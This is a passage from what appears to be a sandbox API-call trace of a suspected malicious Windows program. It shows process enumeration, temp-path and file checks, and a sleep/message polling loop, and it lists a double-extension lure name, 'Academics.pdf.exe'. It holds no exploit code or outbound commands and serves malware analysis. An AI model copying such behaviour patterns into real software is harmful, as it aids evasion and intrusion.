pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0291.584] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0291.585] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.586] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0291.587] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0291.587] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0291.588] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0291.589] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0291.589] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0291.590] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0291.591] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0291.591] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0291.592] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0291.593] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0291.593] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0291.594] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0291.595] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0291.595] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0291.596] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0291.596] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0291.597] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0291.598] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0291.599] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0291.600] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.600] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0291.601] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.602] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0291.602] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0291.603] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0291.604] CloseHandle (hObject=0x294) returned 1 [0291.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0291.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0291.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0291.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0291.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0291.604] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0291.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0291.604] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0291.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0291.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0291.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0291.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0291.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0291.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0291.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0291.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0291.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0291.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0291.604] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0291.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0291.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0291.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0291.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0291.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0291.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0291.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0291.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0291.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0291.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0291.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0291.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0291.605] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0291.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0291.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0291.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaa8 [0291.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0291.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0291.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab20 [0291.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0291.606] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf2a0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0291.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0291.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0291.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0291.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0291.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0291.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0291.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0291.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0291.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0291.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0291.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0291.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0291.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0291.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0291.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0291.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0291.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0291.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0291.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0291.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0291.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0291.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0291.607] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\8x8x8")) returned 0x2020 [0291.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0291.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0291.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0291.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0291.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0291.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0291.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0291.607] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0291.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0291.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0291.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0291.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0291.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0291.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0291.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0291.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0291.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0291.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0291.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0291.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0291.608] timeGetTime () returned 0x48e87 [0291.608] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0291.608] Sleep (dwMilliseconds=0xa) [0291.611] timeGetTime () returned 0x48e97 [0291.611] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0291.612] Sleep (dwMilliseconds=0xa) [0291.627] timeGetTime () returned 0x48ea7 [0291.627] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0291.627] Sleep (dwMilliseconds=0xa) [0291.642] timeGetTime () returned 0x48eb6 [0291.642] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0291.642] Sleep (dwMilliseconds=0xa) [0291.659] timeGetTime () returned 0x48ec6 [0291.659] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0291.659] Sleep (dwMilliseconds=0xa) [0291.674] timeGetTime () returned 0x48ed5 [0291.675] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0291.675] Sleep (dwMilliseconds=0xa) [0291.689] timeGetTime () returned 0x48ee5 [0291.689] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0291.689] Sleep (dwMilliseconds=0xa) [0291.705] timeGetTime () returned 0x48ef5 [0291.705] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0291.705] Sleep (dwMilliseconds=0xa) [0291.720] timeGetTime () returned 0x48f04 [0291.720] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0291.720] Sleep (dwMilliseconds=0xa) [0291.736] timeGetTime () returned 0x48f14 [0291.736] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0291.736] Sleep (dwMilliseconds=0xa) [0291.752] timeGetTime () returned 0x48f23 [0291.752] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0291.752] Sleep (dwMilliseconds=0xa) [0291.767] timeGetTime () returned 0x48f33 [0291.767] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0291.768] Sleep (dwMilliseconds=0xa) [0291.783] timeGetTime () returned 0x48f43 [0291.783] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0291.783] Sleep (dwMilliseconds=0xa) [0291.798] timeGetTime () returned 0x48f52 [0291.799] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0291.799] Sleep (dwMilliseconds=0xa) [0291.814] timeGetTime () returned 0x48f62 [0291.814] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0291.814] Sleep (dwMilliseconds=0xa) [0291.830] timeGetTime () returned 0x48f71 [0291.830] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0291.830] Sleep (dwMilliseconds=0xa) [0291.845] timeGetTime () returned 0x48f81 [0291.845] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0291.845] Sleep (dwMilliseconds=0xa) [0291.861] timeGetTime () returned 0x48f91 [0291.861] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0291.861] Sleep (dwMilliseconds=0xa) [0291.876] timeGetTime () returned 0x48fa0 [0291.876] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0291.876] Sleep (dwMilliseconds=0xa) [0291.892] timeGetTime () returned 0x48fb0 [0291.892] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0291.892] Sleep (dwMilliseconds=0xa) [0291.908] timeGetTime () returned 0x48fbf [0291.908] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0291.908] Sleep (dwMilliseconds=0xa) [0291.923] timeGetTime () returned 0x48fcf [0291.923] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0291.923] Sleep (dwMilliseconds=0xa) [0291.939] timeGetTime () returned 0x48fdf [0291.939] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0291.939] Sleep (dwMilliseconds=0xa) [0291.962] timeGetTime () returned 0x48fee [0291.962] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0291.962] Sleep (dwMilliseconds=0xa) [0291.973] timeGetTime () returned 0x48ffe [0291.973] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0291.976] Sleep (dwMilliseconds=0xa) [0291.985] timeGetTime () returned 0x4900d [0291.986] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0291.986] Sleep (dwMilliseconds=0xa) [0292.001] timeGetTime () returned 0x4901d [0292.001] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.001] Sleep (dwMilliseconds=0xa) [0292.017] timeGetTime () returned 0x4902d [0292.017] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.017] Sleep (dwMilliseconds=0xa) [0292.033] timeGetTime () returned 0x4903c [0292.033] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.033] Sleep (dwMilliseconds=0xa) [0292.048] timeGetTime () returned 0x4904c [0292.048] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 